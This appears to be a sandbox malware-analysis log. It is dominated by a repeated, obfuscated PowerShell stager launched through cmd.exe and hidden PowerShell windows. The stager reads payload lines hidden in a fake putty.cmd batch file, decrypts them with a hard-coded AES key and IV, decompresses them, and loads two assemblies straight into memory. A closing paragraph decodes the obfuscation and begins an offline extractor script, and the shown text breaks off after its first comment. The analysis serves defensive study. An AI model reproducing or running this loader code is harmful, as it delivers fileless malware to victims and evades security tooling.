HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
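The cmd.exe command line above is the entire PowerShell stager. `$rFXv` is a list of .NET member names with junk tokens stripped by `.Replace()`; resolved in order, its entries are EntryPoint, CreateDecryptor, CopyTo, ChangeExtension, GetCurrentProcess, Invoke, ReadLines, Decompress, ElementAt, Load, MainModule, FromBase64String, Split and TransformFinalBlock (indexes 3, 4, 10 and 12 are never used). The script sets the console title to C:\Users\Admin\putty.cmd, reads that file back through `[Console]::Title`, takes the lines at 0-based indexes 5 and 6, drops their first two characters, base64-decodes, AES-CBC/PKCS7-decrypts with the hard-coded 32-byte key and 16-byte IV, GZip-inflates, and hands each result to `Assembly.Load(...).EntryPoint.Invoke()`; the index-6 blob (`$YFqfz`) is loaded first, then the index-5 blob (`$kqnRx`). The PowerShell below is an added example, not code from the report or from the malware: it runs the same decode chain offline against a copy of putty.cmd and writes the two decrypted assemblies to disk instead of loading them. The key and IV are the ones in the command line; the parameter names, the output file names and the assumption that the two stripped characters are a cmd comment marker such as `::` are ours.

```powershell
# Added example (not part of the sandbox report): offline extractor for the two payload
# blobs the captured stager decrypts from putty.cmd. Key, IV and the pipeline
# (base64 -> AES-CBC/PKCS7 -> GZip -> Assembly.Load) come from the command line above;
# parameter names, output names and the '::' prefix assumption are ours.
param(
    [Parameter(Mandatory)][string]$CmdPath,                      # copy of C:\Users\Admin\putty.cmd
    [string]$OutDir = (Join-Path (Get-Location) 'extracted')     # where decrypted blobs are written
)

# Constants lifted verbatim from the stager ($RxMuP.Key / $RxMuP.IV).
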